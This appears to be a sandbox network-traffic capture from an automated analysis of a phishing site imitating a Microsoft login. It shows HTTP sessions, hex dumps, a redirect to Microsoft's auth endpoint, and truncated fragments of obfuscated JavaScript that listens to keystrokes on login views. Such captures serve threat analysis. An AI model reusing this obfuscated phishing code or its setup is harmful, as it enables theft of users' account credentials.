                          2024-05-22 15:57:23 UTC628INData Raw: 28 6f 2e 68 72 65 66 2c 61 2b 6c 2e 6c 65 6e 67 74 68 29 29 7d 63 61 74 63 68 28 69 29 7b 65 28 69 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 75 29 2c 63 3d 30 3b 63 3c 72 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 74 72 79 7b 76 61 72 20 6f 3d 72 5b 63 5d 2c 61 3d 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 69 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 66 29 3b 69 66 28 69 29 7b 76 61 72 20 6c 3d 6e 28 69 2c 30 29 2c 64 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 6c 29 3b 61 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 64 2c 6f 29 7d 7d 63 61 74 63 68 28 68 29 7b 65 28 68 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 74 29 7b 66 6f 72 28 76 61
                          Data Ascii: (o.href,a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(va


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          38192.168.2.449781188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:23 UTC1468OUTGET /ijyi2hjS5erxCGdTqsT8BtwI3rNaQaISKnbm7WopvWzN1oLZWZsUwUlQNCWPnDUtG3kZb3yz221 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IkdzWDYyODR6NmlZdjNJWXVjd3NjRWc9PSIsInZhbHVlIjoiRXFqNDJES1VuM2wvNXFzK3hnWmVkRFhSSHJZMGg0VVA3S2I1ZlowaWQyWVE4Y2kxMS9lVVNzbG9MOFBPWS9USWx4V0d5RjF3SU1NZGZkbm1VM214VXk0K0hQVkdwMGF6QW5qeGx6YWlJMHBVcE1HU3BaY2V3Tmp0RElWZjJxTHAiLCJtYWMiOiI1Yzc2ZmExYzU1OGFmMDc4MDFkMjFmZmM3ZjgwYjZhOTAyZjYwZmVhZGVkMGU1ZjM2N2FkODQwZmI2NTYzOTNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyV0dETU5HdGx4czVsb0RvNCtWbmc9PSIsInZhbHVlIjoiSVVDWEl2cVpDNVpDZk5rQnpjaXgzSXJScGliRGg1b2R1T2FmdEdvSDMxWmZnblJFczlNWW8ydlZkSEdGVnNwYVJqaVFxeDNOTjFDQ0ZOY0x2ZXBTdElMVTR2U3dUa3h5Wnc0Zk5aa0czK1lmQ1o3K2lPQ0xKTFZUT0dNRC8yblgiLCJtYWMiOiJkYzc5NzRlN2U4NWZjMTJhZDYzYzE5MWI5ZmQxY2I0NTQ5MjY2MGRhZWFmN2JkYzIwNjJkYmRhM2EzZGVhZjNjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:25 UTC676INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:25 GMT
                          Content-Type: image/png
                          Content-Length: 1400
                          Connection: close
                          Content-Disposition: inline; filename="ijyi2hjS5erxCGdTqsT8BtwI3rNaQaISKnbm7WopvWzN1oLZWZsUwUlQNCWPnDUtG3kZb3yz221"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xIyF3BEXrL3FqOlg%2FU1Tsw89wjx8IpkgiR1%2BrrB%2Fu%2B2j2bdQ%2BFBFvwT6kUFMPgND4P9I4gENT%2FugEikplgI7P0%2BAWu8hstY7Qhy94XRnFx1FBCCGYwmKXlf2VawY3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e006ec9324388-EWR
                          2024-05-22 15:57:25 UTC693INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 05 3f 49 44 41 54 68 43 ed 58 bd 6e 13 41 10 be 4b d2 d0 20 87 b4 48 38 bc 00 c9 13 10 37 50 c6 ee 91 70 9e 00 e7 af 26 ae f3 83 f3 04 18 89 3e 97 92 34 98 27 c0 79 81 60 24 5a c0 d0 d0 24 31 df b7 9a 39 8d 97 3b bc 91 0c 77 91 7c d2 c9 f6 7a 76 76 76 be f9 8f 7f d6 1f 8e a2 b0 e7 db dd e4 62 e9 e5 59 f4 15 e4 f7 42 b6 b4 9f 44 71 08 dd 8c 26 5c 03 f1 0c b0 70 65 95 81 72 06 58 19 50 b8 81 0c 33 c0 6e a0 ac 7f 4d da 6a b5 aa f3 f3 f3 2b a3 d1 a8 72 7d 7d 9d 74 3a 9d a1 7f 66 61 80 6d 6d 6d 35 55 18 08 d9 df df df ef e7 29 64 77 77 77 e5 ea ea 6a 85 ff c7 71 3c 3c 3c 3c 4c f8 7d 67 67 67 0d 1f eb 97 97 97 ed ac cb fd 6b 05 4f 93 3f f4 d1 c2 dd 5e 82 67
                          Data Ascii: PNGIHDRl?IDAThCXnAK H87Pp&>4'y`$Z$19;w|zvvvbYBDq&\perXP3nMj+r}}t:fammm5U)dwwwjq<<<<L}gggkO?^g
                          2024-05-22 15:57:25 UTC707INData Raw: 67 61 63 00 e3 31 43 e6 07 18 cc 0f 49 f4 b4 74 ca e1 ef 65 7e 71 8a 26 e8 36 af 32 42 e0 7d c3 2a 56 ce 70 f2 9b 42 c9 f2 22 0d ef ca 27 c1 9e 4d 18 01 73 f0 73 91 99 b2 fa 1e 56 25 2d d6 3f 38 79 43 14 3f 6d 1a 1f b0 85 85 05 7a 09 15 9d 26 5d 5c 98 56 4e eb 73 1e 85 d0 f2 6a 12 60 c6 ea 19 02 6b 59 ad 82 05 0c fc 36 34 d4 59 10 ec ba 28 5f 65 61 5b e1 72 8c c8 1b 31 42 f8 e7 18 d9 1d bd 17 35 18 02 e9 c5 69 a1 75 a3 1c 16 bd fd 1e e6 61 51 f4 2b 7a b6 78 7f f4 2e fa 82 b3 82 3c 2c 7e 1a e6 61 cc 1d 10 7a 2c bc 49 85 54 87 62 da 50 ea 5e 08 60 ba 07 f2 8d 79 aa 35 38 0b 18 2c 7c 51 fb b7 bc 75 dd ab 2d 84 86 5f 95 97 ff fb 6d 85 31 1c e7 91 f6 7c 6b ac 6a 18 37 05 2c 78 f8 0b c0 96 00 58 f0 f0 17 80 65 7a b0 ef 61 04 8c 8d b4 58 de 00 8a 5c 45 98 24 80
                          Data Ascii: gac1CIte~q&62B}*VpB"'MssV%-?8yC?mz&]\VNsj`kY64Y(_ea[r1B5iuaQ+zx.<,~az,ITbP^`y58,|Qu-_m1|kj7,xXezaX\E$


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          39192.168.2.449782188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:23 UTC1465OUTGET /klB7kuQPnNOpgjTwJDNQWLIBBFa0XWEJbVMH8UZf3fXc0563H7XRHd32dCoJNir2Gheuv220 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IkdzWDYyODR6NmlZdjNJWXVjd3NjRWc9PSIsInZhbHVlIjoiRXFqNDJES1VuM2wvNXFzK3hnWmVkRFhSSHJZMGg0VVA3S2I1ZlowaWQyWVE4Y2kxMS9lVVNzbG9MOFBPWS9USWx4V0d5RjF3SU1NZGZkbm1VM214VXk0K0hQVkdwMGF6QW5qeGx6YWlJMHBVcE1HU3BaY2V3Tmp0RElWZjJxTHAiLCJtYWMiOiI1Yzc2ZmExYzU1OGFmMDc4MDFkMjFmZmM3ZjgwYjZhOTAyZjYwZmVhZGVkMGU1ZjM2N2FkODQwZmI2NTYzOTNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyV0dETU5HdGx4czVsb0RvNCtWbmc9PSIsInZhbHVlIjoiSVVDWEl2cVpDNVpDZk5rQnpjaXgzSXJScGliRGg1b2R1T2FmdEdvSDMxWmZnblJFczlNWW8ydlZkSEdGVnNwYVJqaVFxeDNOTjFDQ0ZOY0x2ZXBTdElMVTR2U3dUa3h5Wnc0Zk5aa0czK1lmQ1o3K2lPQ0xKTFZUT0dNRC8yblgiLCJtYWMiOiJkYzc5NzRlN2U4NWZjMTJhZDYzYzE5MWI5ZmQxY2I0NTQ5MjY2MGRhZWFmN2JkYzIwNjJkYmRhM2EzZGVhZjNjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:25 UTC679INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:25 GMT
                          Content-Type: image/svg+xml
                          Transfer-Encoding: chunked
                          Connection: close
                          Content-Disposition: inline; filename="klB7kuQPnNOpgjTwJDNQWLIBBFa0XWEJbVMH8UZf3fXc0563H7XRHd32dCoJNir2Gheuv220"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hyEyfAkAzBvu8klKXYJSkkQmeDo%2B8ig4R6hZ3lXNmTnWzzFDB73%2FKZyLRsVxO%2Ba9noxKedhy%2BiD5VTgoVZ1ZQ2wWWnBife3lG9OCFmkxWIG3LS3X%2FUK6g5ozQZYGcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e006ee9ee41de-EWR
                          2024-05-22 15:57:25 UTC690INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                          Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                          2024-05-22 15:57:25 UTC1181INData Raw: 34 20 31 39 38 2d 34 32 34 2e 34 34 35 20 31 32 31 35 2e 36 20 32 36 35 2e 38 20 31 32 31 35 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 44 29 22 2f 3e 3c 2f 67 3e 3c 64 65 66 73 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 39 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 31 30 37 63 31 30 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31
                          Data Ascii: 4 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1
                          2024-05-22 15:57:25 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          40192.168.2.449783188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:23 UTC1538OUTPOST /ro9EGsgt7WhYocqNMxT5aKqWBswapyeJg6XDk6Wh1EcHQ86i HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          Content-Length: 30
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          Accept: */*
                          Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                          X-Requested-With: XMLHttpRequest
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Origin: https://oknya83345.eleteriod.com
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Referer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IkdzWDYyODR6NmlZdjNJWXVjd3NjRWc9PSIsInZhbHVlIjoiRXFqNDJES1VuM2wvNXFzK3hnWmVkRFhSSHJZMGg0VVA3S2I1ZlowaWQyWVE4Y2kxMS9lVVNzbG9MOFBPWS9USWx4V0d5RjF3SU1NZGZkbm1VM214VXk0K0hQVkdwMGF6QW5qeGx6YWlJMHBVcE1HU3BaY2V3Tmp0RElWZjJxTHAiLCJtYWMiOiI1Yzc2ZmExYzU1OGFmMDc4MDFkMjFmZmM3ZjgwYjZhOTAyZjYwZmVhZGVkMGU1ZjM2N2FkODQwZmI2NTYzOTNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyV0dETU5HdGx4czVsb0RvNCtWbmc9PSIsInZhbHVlIjoiSVVDWEl2cVpDNVpDZk5rQnpjaXgzSXJScGliRGg1b2R1T2FmdEdvSDMxWmZnblJFczlNWW8ydlZkSEdGVnNwYVJqaVFxeDNOTjFDQ0ZOY0x2ZXBTdElMVTR2U3dUa3h5Wnc0Zk5aa0czK1lmQ1o3K2lPQ0xKTFZUT0dNRC8yblgiLCJtYWMiOiJkYzc5NzRlN2U4NWZjMTJhZDYzYzE5MWI5ZmQxY2I0NTQ5MjY2MGRhZWFmN2JkYzIwNjJkYmRhM2EzZGVhZjNjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:23 UTC30OUTData Raw: 70 61 67 65 6c 69 6e 6b 3d 74 64 78 32 72 26 74 79 70 65 3d 34 26 61 70 70 6e 75 6d 3d 31
                          Data Ascii: pagelink=tdx2r&type=4&appnum=1
                          2024-05-22 15:57:25 UTC995INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:25 GMT
                          Content-Type: application/json
                          Transfer-Encoding: chunked
                          Connection: close
                          Cache-Control: no-cache, private
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7aoF3IOpF2VT9wWkinQyUalM1w6q08Mj7lxyi%2B2L6eTYtrBWwHDGGNfqf35BmOu7jT%2BpbaQnTtP1UtFwb6HWtxdpKGrWyJvIjhCm7W4MRKmnI7MTdwoeIhOh8nP77g%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Set-Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; expires=Wed, 22-May-2024 17:57:24 GMT; Max-Age=7200; path=/; secure; samesite=none
                          2024-05-22 15:57:25 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 64 79 4d 54 4e 35 54 46 6f 30 56 58 52 76 51 6d 4e 6b 4d 6b 4a 52 57 46 6f 30 54 6e 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4e 55 68 5a 4e 56 4e 6b 56 6a 55 31 54 44 5a 70 51 6a 6c 44 4c 31 56 6b 52 33 68 4a 61 46 49 77 61 44 63 34 54 47 70 6b 4c 31 4e 56 52 55 35 55 62 31 51 35 56 57 35 55 59 53 74 75 64 44 52 42 54 54 64 49 59 6e 52 4c 62 6b 6c 69 4f 55 70 4a 55 55 56 31 63 7a 6c 31 4d 55 51 7a 56 6e 42 77 61 58 6c 43 53 6c 56 78 57 6b 59 79 62 45 55 34 4d 6b 67 33 4e 58 46 33 5a 32 31 6e 52 55 74 7a 62 55 35 56 61 47 6c 77 4e 45 68 6c 63 58 51 31 56 46 42 54 4f 56 46 72 54 6d 39 79 53 69 39 43 54 44 52 47 63 47 39 79 51 6d 63
                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmc
                          2024-05-22 15:57:25 UTC97INData Raw: 35 62 0d 0a 7b 22 65 78 70 69 72 65 64 22 3a 30 2c 22 72 65 64 69 72 65 63 74 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 5c 2f 63 6f 6d 6d 6f 6e 5c 2f 53 41 53 5c 2f 50 72 6f 63 65 73 73 41 75 74 68 22 7d 0d 0a
                          Data Ascii: 5b{"expired":0,"redirecturl":"https:\/\/login.microsoftonline.com\/common\/SAS\/ProcessAuth"}
                          2024-05-22 15:57:25 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          41192.168.2.449785188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:24 UTC1371OUTGET /56p7yi2p9RpjhqPghDmZgIJwAIJYRIQSD89110 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: script
                          Referer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IkdzWDYyODR6NmlZdjNJWXVjd3NjRWc9PSIsInZhbHVlIjoiRXFqNDJES1VuM2wvNXFzK3hnWmVkRFhSSHJZMGg0VVA3S2I1ZlowaWQyWVE4Y2kxMS9lVVNzbG9MOFBPWS9USWx4V0d5RjF3SU1NZGZkbm1VM214VXk0K0hQVkdwMGF6QW5qeGx6YWlJMHBVcE1HU3BaY2V3Tmp0RElWZjJxTHAiLCJtYWMiOiI1Yzc2ZmExYzU1OGFmMDc4MDFkMjFmZmM3ZjgwYjZhOTAyZjYwZmVhZGVkMGU1ZjM2N2FkODQwZmI2NTYzOTNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyV0dETU5HdGx4czVsb0RvNCtWbmc9PSIsInZhbHVlIjoiSVVDWEl2cVpDNVpDZk5rQnpjaXgzSXJScGliRGg1b2R1T2FmdEdvSDMxWmZnblJFczlNWW8ydlZkSEdGVnNwYVJqaVFxeDNOTjFDQ0ZOY0x2ZXBTdElMVTR2U3dUa3h5Wnc0Zk5aa0czK1lmQ1o3K2lPQ0xKTFZUT0dNRC8yblgiLCJtYWMiOiJkYzc5NzRlN2U4NWZjMTJhZDYzYzE5MWI5ZmQxY2I0NTQ5MjY2MGRhZWFmN2JkYzIwNjJkYmRhM2EzZGVhZjNjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:25 UTC650INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:25 GMT
                          Content-Type: application/javascript
                          Transfer-Encoding: chunked
                          Connection: close
                          Content-Disposition: inline; filename="56p7yi2p9RpjhqPghDmZgIJwAIJYRIQSD89110"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cnCHSkvCkhNabVgCTv%2Bwsnq0jJWq6kVslcMvNqN3xnt1kpnVtr03C1HsbG5QHBgvg85hlyizs1yHNJDOFarTJ0%2BwtRmhoZmdHwDUOl%2B7YdWfWogRHGvzVf37bA9VTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e0072e9145e82-EWR
                          2024-05-22 15:57:25 UTC719INData Raw: 33 36 30 30 0d 0a 63 6f 6e 73 74 20 5f 30 78 31 34 36 31 36 32 3d 5f 30 78 34 38 37 63 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 64 62 36 39 30 2c 5f 30 78 62 66 33 33 35 66 29 7b 63 6f 6e 73 74 20 5f 30 78 33 32 33 31 36 65 3d 5f 30 78 34 38 37 63 2c 5f 30 78 33 31 37 66 32 61 3d 5f 30 78 34 64 62 36 39 30 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 33 39 32 31 32 66 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 32 33 31 36 65 28 30 78 31 34 65 29 29 2f 30 78 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 32 33 31 36 65 28 30 78 31 66 30 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 32 33 31 36 65 28 30 78 61 35 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 32 33 31 36 65 28 30
                          Data Ascii: 3600const _0x146162=_0x487c;(function(_0x4db690,_0xbf335f){const _0x32316e=_0x487c,_0x317f2a=_0x4db690();while(!![]){try{const _0x39212f=parseInt(_0x32316e(0x14e))/0x1*(-parseInt(_0x32316e(0x1f0))/0x2)+parseInt(_0x32316e(0xa5))/0x3+-parseInt(_0x32316e(0
                          2024-05-22 15:57:25 UTC1369INData Raw: 78 31 39 65 29 5d 28 5f 30 78 31 34 36 31 36 32 28 30 78 31 32 37 29 29 26 26 28 76 69 65 77 3d 5f 30 78 31 34 36 31 36 32 28 30 78 62 39 29 29 3b 64 6f 63 75 6d 65 6e 74 5b 27 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 27 5d 28 5f 30 78 31 34 36 31 36 32 28 30 78 32 30 38 29 29 26 26 21 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 34 36 31 36 32 28 30 78 62 62 29 5d 28 5f 30 78 31 34 36 31 36 32 28 30 78 32 30 38 29 29 5b 5f 30 78 31 34 36 31 36 32 28 30 78 62 32 29 5d 5b 5f 30 78 31 34 36 31 36 32 28 30 78 31 39 65 29 5d 28 5f 30 78 31 34 36 31 36 32 28 30 78 31 32 37 29 29 26 26 28 76 69 65 77 3d 5f 30 78 31 34 36 31 36 32 28 30 78 63 32 29 29 3b 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 34 36 31 36 32 28 30 78 31 32 65 29 5d 28 27 6b 65 79 75 70 27 2c 66 75 6e
                          Data Ascii: x19e)](_0x146162(0x127))&&(view=_0x146162(0xb9));document['getElementById'](_0x146162(0x208))&&!document[_0x146162(0xbb)](_0x146162(0x208))[_0x146162(0xb2)][_0x146162(0x19e)](_0x146162(0x127))&&(view=_0x146162(0xc2));document[_0x146162(0x12e)]('keyup',fun
                          2024-05-22 15:57:25 UTC1369INData Raw: 6e 28 5f 30 78 34 66 38 34 32 65 29 7b 63 6f 6e 73 74 20 5f 30 78 35 32 35 32 36 66 3d 5f 30 78 31 34 36 31 36 32 3b 5f 30 78 34 66 38 34 32 65 3d 3d 30 78 30 26 26 28 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 35 32 35 32 36 66 28 30 78 62 62 29 5d 28 5f 30 78 35 32 35 32 36 66 28 30 78 31 35 62 29 2b 76 69 65 77 29 5b 27 71 75 65 72 79 53 65 6c 65 63 74 6f 72 27 5d 28 5f 30 78 35 32 35 32 36 66 28 30 78 31 64 65 29 29 5b 5f 30 78 35 32 35 32 36 66 28 30 78 62 32 29 5d 5b 5f 30 78 35 32 35 32 36 66 28 30 78 31 65 39 29 5d 28 5f 30 78 35 32 35 32 36 66 28 30 78 31 33 39 29 29 2c 64 6f 63 75 6d 65 6e 74 5b 27 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 27 5d 28 5f 30 78 35 32 35 32 36 66 28 30 78 31 35 62 29 2b 76 69 65 77 29 5b 5f 30 78 35 32 35 32 36 66 28 30 78
                          Data Ascii: n(_0x4f842e){const _0x52526f=_0x146162;_0x4f842e==0x0&&(document[_0x52526f(0xbb)](_0x52526f(0x15b)+view)['querySelector'](_0x52526f(0x1de))[_0x52526f(0xb2)][_0x52526f(0x1e9)](_0x52526f(0x139)),document['getElementById'](_0x52526f(0x15b)+view)[_0x52526f(0x
